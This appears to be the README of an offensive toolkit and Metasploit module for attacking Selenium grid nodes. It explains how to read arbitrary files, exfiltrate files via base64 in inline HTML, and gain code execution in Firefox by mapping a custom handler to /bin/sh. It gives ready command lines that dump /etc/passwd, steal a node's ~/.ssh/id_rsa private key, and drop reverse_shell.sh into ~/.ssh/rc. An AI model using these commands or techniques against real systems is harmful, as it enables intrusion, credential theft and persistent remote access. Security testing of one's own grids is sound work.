This combines some of the examples below to upload files to, download files from, and execute code on a Selenium node (via the “COMMAND_TYPE” param). RCE currently only works on Linux. To install, copy this to "~/.msf4/modules/exploits/multi/http/" or whatever.
This simply surfs to the "file:" url and dumps the page contents.
examples/selenium_node_cat.py -h http://selenium-hub.lan:4444/wd/hub -r /etc/passwd
This using inline HTML to create an inline form with a file upload input. It then sends a local file location into this form. Java-script in this form embeds this base64 encoded file into the same page. This is then read and decoded by the scripts, and saved to a local file.
examples/selenium_node_download.py -h http://selenium-hub.lan:4444/wd/hub -r ~/.ssh/id_rsa -l ./nodes_rsa
Like the Node Download scripts, but not bothering with processing the file in Java-script. If the file doesn't exist, the script, the send_keys() will throw an exception.
Firefox only. Uses a Firefox Profile (which is just a base64 encoded zip file embedded in an Selenium API hit) to create a custom handler (“application/sh” to /bin/sh in this case). It then base64 encodes some shell commands and uses inline “data:” to pass in commands associated with “application/sh”. Firefox will then create a temp file with the commands and execute it with sh.
Firefox only. Uses a Firefox Profile to set a custom download directory and turn off the "Save as" prompt. Then surfs to inline HTML with and embedded "data:" link which is the encoded file to upload. This link is then clicked on.
examples/selenium_node_upload.py -h http://selenium-hub.lan:4444/wd/hub -r ~/.ssh/rc -l ./reverse_shell.sh
Firefox only. Uses a Filefox Profile, which isnt safely unzipped, to write a file to the Node's filesystem.